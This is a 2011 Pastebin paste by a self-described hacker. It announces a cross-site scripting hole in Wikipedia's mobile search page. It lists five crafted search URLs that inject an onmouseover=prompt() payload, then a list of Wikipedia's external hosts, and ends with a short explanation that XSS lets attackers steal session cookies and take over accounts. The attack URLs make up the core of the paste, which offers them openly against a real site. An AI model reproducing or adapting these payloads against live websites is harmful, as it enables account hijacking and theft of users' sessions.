API tools faq
paste
Advertisement
thehacker12

Wikipedia Vulnerable for attack

thehacker12
Oct 4th, 2011
1,469
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.89 KB | None | 0 0
raw download clone embed print report
  1. Wikipedia, the worlds largest 'biased' information portal is vulnerable to XSS or Cross Site Scripting attack. Following are the links through which the attack can be commenced.
  2.  
  3. By
  4. ThEhAcKeR12
  5. Twitter: @ThEhAcKeR12
  6.  
  7. http://en.wikipedia.org/w/index.php?search=%27%20onmouseover%3dprompt%28952154%29%20bad%3d%27&title=Special:Search&useformat=mobile
  8.  
  9. http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=0&search=%27%20onmouseover%3dprompt%28955575%29%20bad%3d%27&title=Special:Search&useformat=mobile
  10.  
  11. http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=1&search=%27%20onmouseover%3dprompt%28941380%29%20bad%3d%27&title=Special:Search&useformat=mobile
  12.  
  13. http://en.wikipedia.org/w/index.php?fulltext=Search&redirs=0&search=%27%20onmouseover%3dprompt%28983464%29%20bad%3d%27&title=Special:Search&useformat=mobile
  14.  
  15. http://en.wikipedia.org/w/index.php?advanced=1&fulltext=Search&ns0=1&ns1=1&ns10=1&ns100=1&ns101=1&ns108=1&ns109=1&ns11=1&ns12=1&ns13=1&ns14=1&ns15=1&ns2=1&ns3=1&ns4=1&ns5=1&ns6=1&ns7=1&ns8=1&ns9=1&redirs=1&search=%27%20onmouseover%3dprompt%28980283%29%20bad%3d%27&title=Special:Search&useformat=mobile
  16.  
  17.  
  18. Wikipedia's list of external hosts:
  19. creativecommons.org
  20. bits.wikimedia.org
  21. secure.wikimedia.org
  22. wikimediafoundation.org
  23. www.mediawiki.org
  24. geoiplookup.wikimedia.org
  25. upload.wikimedia.org
  26. www.freenode.net
  27. www.wikimediafoundation.org
  28. www.contactmusic.com
  29. www.belfasttelegraph.co.uk
  30. enjoyment.independent.co.uk
  31. archives.cnn.com
  32. blackstarnews.com
  33. www.polkonline.com
  34. www.askmen.com
  35. www.addictioninfo.org
  36. metromix.chicagotribune.com
  37. paralleluniverse.msn.com
  38. web.archive.org
  39. www.hollywoodreporter.com
  40. www.thewrap.com
  41. www.satansalley.com
  42. www.mediablvd.com
  43. news.yahoo.com
  44. www.cinemablend.com
  45. www.godisageek.com
  46. www.sfgate.com
  47. www.premiere.com
  48. people.aol.com
  49. www.people.com
  50. www.monk.com
  51. www.youtube.com
  52. www.imdb.com
  53. ar.wikipedia.org
  54. bg.wikipedia.org
  55. cs.wikipedia.org
  56. cy.wikipedia.org
  57. da.wikipedia.org
  58. de.wikipedia.org
  59. dv.wikipedia.org
  60. et.wikipedia.org
  61. el.wikipedia.org
  62. es.wikipedia.org
  63. fa.wikipedia.org
  64. fr.wikipedia.org
  65. hr.wikipedia.org
  66. id.wikipedia.org
  67. it.wikipedia.org
  68. he.wikipedia.org
  69. jv.wikipedia.org
  70. lv.wikipedia.org
  71. hu.wikipedia.org
  72. ms.wikipedia.org
  73. mn.wikipedia.org
  74. nl.wikipedia.org
  75. ja.wikipedia.org
  76. no.wikipedia.org
  77. pl.wikipedia.org
  78. pt.wikipedia.org
  79. ro.wikipedia.org
  80. ru.wikipedia.org
  81. sq.wikipedia.org
  82. simple.wikipedia.org
  83. sk.wikipedia.org
  84. sr.wikipedia.org
  85. fi.wikipedia.org
  86. sv.wikipedia.org
  87. tl.wikipedia.org
  88. th.wikipedia.org
  89. tr.wikipedia.org
  90. uk.wikipedia.org
  91. zh.wikipedia.org
  92.  
  93.  
  94. What is XSS or Cross Site Scripting - Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable link to fool a user in order to gather data from them. A Hacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!